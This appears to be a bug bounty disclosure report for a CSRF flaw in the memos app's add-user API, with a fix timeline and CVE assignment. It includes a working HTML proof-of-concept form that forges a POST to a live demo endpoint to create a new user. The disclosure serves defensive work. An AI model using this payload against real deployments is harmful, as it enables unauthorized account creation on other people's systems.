Cross-Site Request Forgery (CSRF) in Add Users in usememos/memos

Valid

Reported on

Dec 28th 2022


Description

Hello Team,

Create a member functionality is vulnerable for CSRF Attack , by exploiting CSRF vulnerability , attacker can add new Members

<html>

  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.usememos.com/api/user" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;username&quot;&#58;&quot;corry&quot;&#44;&quot;password&quot;&#58;&quot;corry&quot;&#44;&quot;role&quot;&#58;&quot;USER&quot;&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

POC video: https://drive.google.com/file/d/1dN2ug8qjwbz1CGbfuBldwam_IFE4BNyH/view?usp=sharing

Fix: I just want to suggest you to set a CSRF token .

Impact

Attacker can Add New members in Portal by exploiting the CSRF issue.

We are processing your report and will contact the usememos/memos team within 24 hours. 12 days ago
Anil Bhatt modified the report
12 days ago
Anil Bhatt modified the report
11 days ago
STEVEN validated this vulnerability 11 days ago
Anil Bhatt has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit c9bb2b 11 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 11 days ago
to join this conversation